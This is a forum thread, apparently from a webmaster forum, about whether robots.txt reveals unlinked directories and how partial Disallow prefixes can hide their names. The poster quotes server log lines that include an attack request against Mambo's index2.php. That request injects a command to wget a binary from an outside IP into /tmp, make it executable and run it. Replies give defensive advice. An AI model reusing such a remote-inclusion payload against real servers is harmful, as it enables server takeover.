Forum Moderators: goodroi
I have a feeling this might be a stupid question, but I haven't been able to find a satisfactory answer anywhere.
I have a couple of directories in the root of my web site which are not referenced in any of the pages on the site (i.e. none of the pages on the site link to the directories or any of the files therein).
My question is, by adding a robots.txt file (allowing any user agent and disallowing nothing) is it possible for a robot to find those directories and their contents? I don't particularly want to advertise their existence by explicitly disallowing them - just in case.
All the pages on the site currently have the <meta name="robots" content="all" /> tag, which I assume is equivalent the the suggested robots.txt file above and I'm assuming that the directories and their contents can't be found this way. In which case I may have answered my own question, but I just need confirmation for peace of mind before I go ahead and add the robots.txt file.
Thanks in advance,
Ken.
Disallows match anything begining with what you specify, so for if example you had a directory called
notallowedhere you could
disallow: /notallow
This way it doesn't reveal the full name of the directory, but will still tell good bots not to try to fetch things from there.
This of course only works for well behaved bots. If you really want to restrict access, you will have to password protect the files.
I'm afraid I'm a little bit paranoid because my log file keeps showing things like this, which I assume are attempts to find and exploit vulnerabilities:
64.50.10.100 - - [05/Mar/2006:05:28:16 +0000] "GET /articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/tmp;wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo¦ HTTP/1.1" 404 309
64.50.10.100 - - [05/Mar/2006:05:28:23 +0000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 306
Is there anything I can do about these, or do I have to live with them (slightly OT, I know - apologies)?
There is nothing you can do to stop people sending requests like that.
If you server is an Apache server you could try having rules in your .htaccess that would deny requests like that, but you would have to be carefull implementing those otherwise you could deny legitimate traffic.
For IIS you can run a lockdown utility that will intercept some of those type of requests, and websites built with the .NET framework also include some checks against those type of exploits as well.
Other than that you just have to make sure that whatever dynamic pages you use verify all GET and POST parameters and reject any thing that is not expected/allowed.